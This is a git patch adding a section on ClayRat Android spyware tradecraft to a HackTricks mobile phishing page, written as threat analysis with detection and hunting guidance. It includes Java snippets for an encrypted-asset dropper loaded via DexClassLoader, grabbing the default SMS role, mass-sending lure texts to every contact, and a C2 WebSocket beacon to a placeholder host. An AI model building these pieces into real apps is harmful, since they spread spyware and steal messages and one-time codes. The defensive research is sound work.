From e31c5d1278f2e58e18751dffeab581d6a9ed2aaa Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Fri, 10 Oct 2025 12:45:05 +0000 Subject: [PATCH] Add content from: ClayRat: A New Android Spyware Targeting Russia --- .../mobile-phishing-malicious-apps.md | 125 +++++++++++++++++- 1 file changed, 124 insertions(+), 1 deletion(-) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md index 7ca3e849f..3eebcee7b 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md @@ -429,6 +429,124 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new - Detect installation/launch of an external NFC-relay app triggered by another app. - For banking: enforce out-of-band confirmations, biometrics-binding, and transaction-limits resistant to on-device automation. +--- + +## Android SMS role abuse, session-based droppers with encrypted assets, and C2 obfuscation – ClayRat tradecraft + +ClayRat is a fast-evolving Android spyware family distributed via look‑alike sites and Telegram channels. Below are reusable techniques observed in the campaign that defenders and red-teamers should model and hunt for. + +### Delivery funnel: lookalike site → Telegram → APK +- Phishing pages impersonate popular apps/services and include step-by-step instructions to enable Unknown Sources on Android. +- Users are redirected to Telegram channels seeded with testimonials/metrics before receiving the APK link. This social proof reduces suspicion. + +### Session-based installer: encrypted payload in assets + fake Play update UI +- The first-stage app presents a fake “Google Play update/verification” screen. +- The functional spyware is stored as an encrypted blob under `/assets/` and decrypted only at runtime, then dynamically loaded. +- Packed variants hide most logic until decryption, hampering static analysis. + +Static triage ideas +- Unzip and look for large opaque blobs under `assets/` whose entropy is high. +- Instrument filesystem to catch a DEX/ZIP written to app-internal storage just before `DexClassLoader`/`PathClassLoader` usage. +- APKiD often shows “packer/loader” hints; network traffic may be minimal until decryption completes. + +
+Example: AES‑GCM decrypt from assets and load with DexClassLoader + +```java +// 1) Read encrypted payload from assets +byte[] enc = readAll(getAssets().open("payload.enc")); +byte[] iv = Arrays.copyOfRange(enc, 0, 12); +byte[] ct = Arrays.copyOfRange(enc, 12, enc.length); + +// 2) Decrypt (key could be hardcoded/derived from device info) +SecretKey key = new SecretKeySpec(deriveKey(), "AES"); +Cipher c = Cipher.getInstance("AES/GCM/NoPadding"); +c.init(Cipher.DECRYPT_MODE, key, new GCMParameterSpec(128, iv)); +byte[] dexBytes = c.doFinal(ct); + +// 3) Persist DEX and dynamically load +File outDex = new File(getCodeCacheDir(), "p.dex"); +Files.write(outDex.toPath(), dexBytes); +DexClassLoader cl = new DexClassLoader(outDex.getPath(), getCodeCacheDir().getPath(), null, getClassLoader()); +Class core = cl.loadClass("com.spy.core.Main"); +core.getMethod("start", Context.class).invoke(core.getConstructor().newInstance(), this); +``` +
+ +### Privilege consolidation via the default SMS handler role +Requesting the device’s default SMS app role consolidates powerful capabilities behind a single consent dialog on modern Android (instead of individual runtime prompts): read/send/intercept SMS, and direct DB access. Malware leverages this to silently mass-message, steal OTPs, and exfiltrate SMS at scale. + +Minimal request flow (Android 10+): + +```java +RoleManager rm = (RoleManager) getSystemService(Context.ROLE_SERVICE); +if (rm.isRoleAvailable(RoleManager.ROLE_SMS) && !rm.isRoleHeld(RoleManager.ROLE_SMS)) { + Intent i = rm.createRequestRoleIntent(RoleManager.ROLE_SMS); + startActivityForResult(i, 1001); +} +``` + +Hunting/detection +- Alert when the default SMS handler changes to an untrusted package. +- Monitor immediate spikes in `SEND_SMS` usage and access to `content://sms` following role grant. + +### Worm-like propagation via contact list +Once SMS and contacts are accessible, the implant mass-sends lures to every contact from the victim’s number. + +```java +Cursor c = getContentResolver().query( + ContactsContract.CommonDataKinds.Phone.CONTENT_URI, + new String[]{ContactsContract.CommonDataKinds.Phone.NUMBER}, null, null, null); +SmsManager sms = SmsManager.getDefault(); +while (c.moveToNext()) { + String num = c.getString(0); + sms.sendTextMessage(num, null, "Узнай первым! ", null, null); +} +``` + +### Event‑driven control: BroadcastReceivers for SMS and calls +Receivers enable reactive execution without a foreground service. + +Manifest sketch: + +```xml + + + + + + + + + + +``` + +Observed actions include immediate front‑camera capture and upload on first run, full SMS dump, call log exfiltration, and commandable call placement. + +### C2 traffic protection, markers, and proxy/WebSocket pivot +- Early variants obfuscate with Base64 and inject the marker string `apezdolskynet` in payloads (plaintext visible after decode). Hunt for this artifact in HTTP bodies. +- Later builds encrypt telemetry and tasking with **AES‑GCM** and keep logic packed until runtime. +- Resilient comms: a command like `get_proxy_data` returns an HTTP/HTTPS endpoint which is converted to a (secure) WebSocket and augmented with a device ID; tasks are scheduled periodically/delayed to keep the channel alive. + +```java +String cfg = httpGet(c2+"/get_proxy_data"); // returns e.g., https://c2.tld/path +Uri u = Uri.parse(cfg); +String ws = ("https".equals(u.getScheme()) ? "wss" : "ws") + "://" + u.getHost() + + (u.getPort()!=-1?":"+u.getPort():"") + u.getPath() + "?id=" + deviceId; +// connect(ws); schedule heartbeat/retry tasks +``` + +### DFIR/Hunting checklist (ClayRat-style) +- Network: flag HTTP POST bodies that Base64‑decode to include `apezdolskynet`. +- Role events: monitor/alert on default SMS handler changes; look for mass‑SMS bursts. +- APK triage: encrypted blobs in `/assets/` with runtime `DexClassLoader` usage; fake Play update UI. +- Components: receivers for `SMS_RECEIVED` and `NEW_OUTGOING_CALL` in untrusted apps. +- Behaviour: front camera used immediately after first grant; exfil of SMS, call logs, notifications. +- Hygiene: ensure Play Protect is enabled; deploy mobile EDR/MTD and block sideloading where possible. + +--- + ## References - [The Dark Side of Romance: SarangTrap Extortion Campaign](https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign) @@ -440,5 +558,10 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new - [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/) - [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN) - [Socket.IO](https://socket.io) +- [ClayRat: A New Android Spyware Targeting Russia](https://zimperium.com/blog/clayrat-a-new-android-spyware-targeting-russia) +- [ClayRat IOCs – Zimperium GitHub](https://github.com/Zimperium/IOC/tree/master/2025-10-ClayRat) +- [Android dangerous permissions overview](https://developer.android.com/guide/topics/permissions/overview#dangerous_permissions) +- [RoleManager (default SMS app role)](https://developer.android.com/reference/android/app/role/RoleManager) +- [Google Play Protect overview](https://support.google.com/googleplay/answer/2812853?hl=en) -{{#include ../../banners/hacktricks-training.md}} +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file